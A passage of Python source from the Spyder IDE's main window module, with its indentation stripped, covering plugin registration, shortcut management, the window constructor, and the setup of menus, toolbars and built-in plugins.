self.set_splash(_("Loading {}...".format(plugin.get_name())))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
toolbars = plugin.get_registered_application_toolbars()
for __, toolbar in toolbars.items():
# TODO: To update this render call
toolbar._render()
self.toolbarslist.append(toolbar)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio,
plugin.sig_status_message_requested,
]
for signal in signals:
try:
signal.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
try:
# New API
if (self.last_plugin is not None
and self.last_plugin.get_widget().is_maximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
except AttributeError:
# Old API
if (self.last_plugin is not None and self.last_plugin._ismaximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugin(self, plugin):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [Console]
tabify = getattr(plugin, 'TABIFY', [self.get_plugin(Plugins.Console)])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf_option('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf_option('enable', True)
plugin.set_conf_option('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitely call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.ipyconsole = None
self.variableexplorer = None
self.plots = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
self.tour_dialog = None
# File switcher
self.switcher = None
# Check for updates Thread and Worker, refereces needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.preferences.general import MainConfigPage
self.general_prefs = [MainConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
self._report_dlg = None
# Quick Layouts and Dialogs
from spyder.preferences.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_interface_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.interpreter_status = None
self.mem_status = None
self.cpu_status = None
self.clock_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.interface_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# The following flag is used to restore window's geometry when
# toggling out of fullscreen mode in Windows.
self.saved_normal_geometry = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# To show the message about starting the tour
self.sig_setup_finished.connect(self.show_tour_message)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window"""
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Creating toolbars...")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
self.projects_menu.aboutToShow.connect(self.valid_project)
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
self.view_menu.aboutToShow.connect(
lambda: self._update_shortcuts_in_panes_menu(True))
self.view_menu.aboutToHide.connect(
lambda: self._update_shortcuts_in_panes_menu(False))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
css_path = CSS_PATH
else:
css_path = CSS_PATH
# Shortcuts plugin
from spyder.plugins.shortcuts.plugin import Shortcuts
self.shortcuts = Shortcuts(self, configuration=CONF)
self.register_plugin(self.shortcuts)
logger.info("Creating core actions...")
self.close_dockwidget_action = create_action(
self, icon=ima.icon('close_pane'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut
)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_interface_action = create_action(
self,
(_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars")),
icon=ima.icon('lock' if self.interface_locked else 'lock_open'),
triggered=lambda checked:
self.toggle_lock(not self.interface_locked),
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_interface_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
self.source_menu.aboutToShow.connect(self.update_source_menu)
logger.info("Creating Tools menu...")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.show_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_shortcut_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("PYTHONPATH manager"),
menurole=QAction.ApplicationSpecificRole)
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
from spyder.plugins.completion.kite.utils.install import (
check_if_kite_installed)
is_kite_installed, kite_path = check_if_kite_installed()
if not is_kite_installed:
install_kite_action = create_action(
self, _("Install Kite completion engine"),
icon=get_icon('kite', adjust_for_interface=True),
triggered=self.show_kite_installation)
self.tools_menu_actions.append(install_kite_action)
self.tools_menu_actions += [MENU_SEPARATOR, reset_spyder_action]
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
self.tools_menu_actions += [self.menu_lsp_logs]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"), name)
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"), "linguist")
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
for act in (qtdact, qtlact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
logger.info("Creating guidata and sift entries...")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see spyder-ide/spyder#2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except:
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except:
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
if sys.platform == 'darwin':
self.fullscreen_action.setEnabled(False)
self.fullscreen_action.setToolTip(_("For fullscreen mode use "
"macOS built-in feature"))
else:
self.register_shortcut(
self.fullscreen_action,
"_",
"Fullscreen mode",
add_shortcut_to_tip=True
)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
# Internal console plugin
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
from spyder.plugins.console.plugin import Console
self.console = Console(self, configuration=CONF)
self.console.set_exit_function(self.closing)
self.register_plugin(self.console)
# TODO: Load and register the rest of the plugins using new API
# Run plugin
from spyder.plugins.run.plugin import Run
self.run = Run(self, configuration=CONF)
self.register_plugin(self.run)
# Appearance plugin
from spyder.plugins.appearance.plugin import Appearance
self.appearance = Appearance(self, configuration=CONF)
self.register_plugin(self.appearance)
# Main interpreter
from spyder.plugins.maininterpreter.plugin import MainInterpreter
self.maininterpreter = MainInterpreter(self, configuration=CONF)
self.register_plugin(self.maininterpreter)
# Code completion client initialization
self.set_splash(_("Starting code completion manager..."))
from spyder.plugins.completion.manager.plugin import CompletionManager
self.completions = CompletionManager(self)
self.completions.start()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer.plugin import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
self.add_plugin(self.outlineexplorer)
from spyder.widgets.status import InterpreterStatus
self.interpreter_status = InterpreterStatus(
self,
status,
icon=ima.icon('environment'),
interpreter=self.maininterpreter.get_interpreter()
)
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor.plugin import Editor
self.editor = Editor(self)
self.editor.register_plugin()
self.add_plugin(self.editor)
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
file_actions = [
self.file_switcher_action,
self.symbol_finder_action,
None,
]
if sys.platform == 'darwin':
file_actions.extend(self.editor.tab_navigation_actions + [None])
file_actions.extend([restart_action, quit_action])
self.file_menu_actions += file_actions
self.set_splash("")
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer.plugin import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
self.add_plugin(self.variableexplorer)
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole.plugin import IPythonConsole
self.ipyconsole = IPythonConsole(self, css_path=css_path)
self.ipyconsole.register_plugin()
self.add_plugin(self.ipyconsole)
# Help plugin
# TODO: There is a circular dependency between help and ipython since
# ipython console uses css_path.
if CONF.get('help', 'enable'):
CONF.set('help', 'css_path', css_path)
from spyder.plugins.help.plugin import Help
self.help = Help(self, configuration=CONF)
self.register_plugin(self.help)
# History log widget
if CONF.get('historylog', 'enable'):
from spyder.plugins.history.plugin import HistoryLog
self.historylog = HistoryLog(self, configuration=CONF)
self.register_plugin(self.historylog)
# Figure browser
self.set_splash(_("Loading figure browser..."))
from spyder.plugins.plots.plugin import Plots
self.plots = Plots(self, configuration=CONF)
self.register_plugin(self.plots)
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer.plugin import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
self.add_plugin(self.explorer)
# Online help widget
if CONF.get('onlinehelp', 'enable'):
from spyder.plugins.onlinehelp.plugin import OnlineHelp
self.onlinehelp = OnlineHelp(self, configuration=CONF)
self.register_plugin(self.onlinehelp)
# Working directory plugin
from spyder.plugins.workingdirectory.plugin import WorkingDirectory
CONF.set('workingdir', 'init_workdir', self.init_workdir)
self.workingdirectory = WorkingDirectory(self, configuration=CONF)
self.register_plugin(self.workingdirectory)
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects.plugin import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
self.add_plugin(self.projects)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles.plugin import FindInFiles
self.findinfiles = FindInFiles(self, configuration=CONF)
self.register_plugin(self.findinfiles)
# Load other plugins (former external plugins)
# TODO: Use this bucle to load all internall plugins and remove
# duplicated code
# Breakpoints
if CONF.get('breakpoints', 'enable'):
from spyder.plugins.breakpoints.plugin import Breakpoints
self.breakpoints = Breakpoints(self, configuration=CONF)
self.register_plugin(self.breakpoints)
self.thirdparty_plugins.append(self.breakpoints)
# Profiler plugin
if CONF.get('profiler', 'enable'):
from spyder.plugins.profiler.plugin import Profiler
self.profiler = Profiler(self, configuration=CONF)
self.register_plugin(self.profiler)
self.thirdparty_plugins.append(self.profiler)
# Code analysis
if CONF.get("pylint", "enable"):
from spyder.plugins.pylint.plugin import Pylint
self.pylint = Pylint(self, configuration=CONF)
self.register_plugin(self.pylint)
self.thirdparty_plugins.append(self.pylint)
# Third-party plugins
from spyder import dependencies
self.set_splash(_("Loading third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'COMPLETION_CLIENT_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# New API: Load and register external plugins
external_plugins = find_external_plugins()
